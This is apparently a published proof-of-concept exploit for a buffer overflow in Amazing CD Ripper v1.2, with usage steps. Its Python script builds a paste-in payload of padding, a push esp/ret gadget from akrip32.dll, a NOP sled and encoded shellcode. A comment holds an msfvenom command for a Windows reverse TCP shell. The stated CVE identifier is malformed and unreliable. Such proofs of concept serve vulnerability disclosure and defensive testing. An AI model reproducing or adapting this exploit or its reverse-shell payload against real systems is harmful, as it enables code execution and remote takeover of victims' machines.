<pre><code># Exploit Title: Amazing CD Ripper v1.2 - Buffer Overflow # Exploit Author: Hejap Zairy # Date: 03.08.2022 # Software Link: http://www.shelltoys.com/cd_ripper.exe # Software Link: https://web.archive.org/web/20160313071152/http://www.shelltoys.com/cd_ripper.exe # Tested Version: v1.2.1 # Tested on: Windows 10 64bit # 1.- Run python code : 0day-Hejap_Zairy.py # 2.- Open 0day_Hejap.txt and copy All content to Clipboard # 3.- Open Amazing CD Ripper and press Enter Code # 4.- Paste the Content of 0day_Hejap.txt into the 'Enter Code' # 5.- Click 'OK' # Author Code By Hejap Zairy #CVE-2022-0x515 #!/usr/bin/env python from pwn import * buffer = "\x41" * 1016 # 0x100017a1 : push esp # ret | null {PAGE_EXECUTE_READ} [akrip32.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v1.0rc2 (C:\Program Files (x86)\Shelltoys\Amazing CD Ripper\akrip32.dll) push_esp = p32(0x100017a1) #push esp ret ret from akrip32.dll nops = "\x90" * 15 #515 tshhh theardlooo love Malware #msfvenom --arch x64 windows/x64/shell_reverse_tcp lhost=ip lport=443 -f python -e x64/shikata_ga_nai -b "\x00\x0a\x0d\x20\xff" #msfvenom --arch x64 -p windows/x64/messagebox TEXT="0day Hejap Zairy" -f python -e x64/shikata_ga_nai EXITFUNC=thread -b "\x00\x0a\x0d\x20\xff" buf = b"" buf += b"\xfc\x48\x81\xe4\xf0\xff\xff\xff\xe8\xd0\x00\x00\x00" buf += b"\x41\x51\x41\x50\x52\x51\x56\x48\x31\xd2\x65\x48\x8b" buf += b"\x52\x60\x3e\x48\x8b\x52\x18\x3e\x48\x8b\x52\x20\x3e" buf += b"\x48\x8b\x72\x50\x3e\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9" buf += b"\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9" buf += b"\x0d\x41\x01\xc1\xe2\xed\x52\x41\x51\x3e\x48\x8b\x52" buf += b"\x20\x3e\x8b\x42\x3c\x48\x01\xd0\x3e\x8b\x80\x88\x00" buf += b"\x00\x00\x48\x85\xc0\x74\x6f\x48\x01\xd0\x50\x3e\x8b" buf += b"\x48\x18\x3e\x44\x8b\x40\x20\x49\x01\xd0\xe3\x5c\x48" buf += b"\xff\xc9\x3e\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9" buf += b"\x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0" buf += b"\x75\xf1\x3e\x4c\x03\x4c\x24\x08\x45\x39\xd1\x75\xd6" buf += b"\x58\x3e\x44\x8b\x40\x24\x49\x01\xd0\x66\x3e\x41\x8b" buf += b"\x0c\x48\x3e\x44\x8b\x40\x1c\x49\x01\xd0\x3e\x41\x8b" buf += b"\x04\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41" buf += b"\x58\x41\x59\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0" buf += b"\x58\x41\x59\x5a\x3e\x48\x8b\x12\xe9\x49\xff\xff\xff" buf += b"\x5d\x49\xc7\xc1\x00\x00\x00\x00\x3e\x48\x8d\x95\x1a" buf += b"\x01\x00\x00\x3e\x4c\x8d\x85\x2b\x01\x00\x00\x48\x31" buf += b"\xc9\x41\xba\x45\x83\x56\x07\xff\xd5\xbb\xe0\x1d\x2a" buf += b"\x0a\x41\xba\xa6\x95\xbd\x9d\xff\xd5\x48\x83\xc4\x28" buf += b"\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb\x47\x13\x72" buf += b"\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5\x30\x64\x61\x79" buf += b"\x20\x48\x65\x6a\x61\x70\x20\x5a\x61\x69\x72\x79\x00" buf += b"\x4d\x65\x73\x73\x61\x67\x65\x42\x6f\x78\x00" padding ="C" * (len(buffer) - len(push_esp) - len(nops)) payload = buffer + push_esp + nops + buf + padding try: with open("0day_Hejap.txt","wb") as f: print("[+] Creating %s Shellcode 0day-Hejap payload.." %len(payload)) f.write(payload) f.close() print("[+] File created!") except: print("[-]File cannot be created") # Proof and Exploit: https://i.imgur.com/3r5sKNo.png </code></pre>